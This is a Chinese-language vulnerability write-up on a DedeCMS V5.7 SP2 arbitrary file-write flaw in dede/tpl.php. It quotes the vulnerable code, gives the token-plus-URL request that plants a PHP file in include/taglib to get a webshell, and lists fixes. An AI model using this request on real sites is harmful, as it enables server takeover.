本站源码全部测试通过,配有前台及后台演示图,绿色安全,希望能对大家有所帮助!
  • 首 页
  • VPS/云主机
  • 交流论坛
  • dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞
    时间:2019-07-16 06:48 来源:开源之家 作者:开源之家

    DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。

    漏洞详情

    织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

    dede/tpl.php中第251行到281行

     

    csrf_check();

     

    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

     

    {

     

        ShowMsg('文件名不合法,不允许进行操作!', '-1');

     

        exit();

     

    }

     

    require_once(DEDEINC.'/oxwindow.class.php');

     

    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);

     

    $content = stripslashes($content);

     

    $truefile = DEDEINC.'/taglib/'.$filename;

     

    $fp = fopen($truefile, 'w');

     

    fwrite($fp, $content);

     

    fclose($fp);

     

    1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

    2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

    注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

    漏洞利用

    1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    然后访问 :

    域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    shell:域名 + /include/taglib/moonsec.lib.php

    漏洞修复

    1.禁止/include/taglib/此处写入文件。

    2.过滤恶意标签

    3.删除dede/tpl.php 文件


    版权声明:
    —— 本文内容由互联网用户自发贡献, 本站不拥有所有权, 不承担相关法律责任, 如果发现本站有涉嫌抄袭的内容, 欢迎发送邮件至 :
    —— 2225329841@qq.com 举报, 并提供相关证据, 一经查实, 本站将立刻删除涉嫌侵权内容。

    开源之家广告栏目A
    开源之家广告栏目B
    开源之家广告栏目C
    在线客服
    客服微信

    扫一扫......加客服微信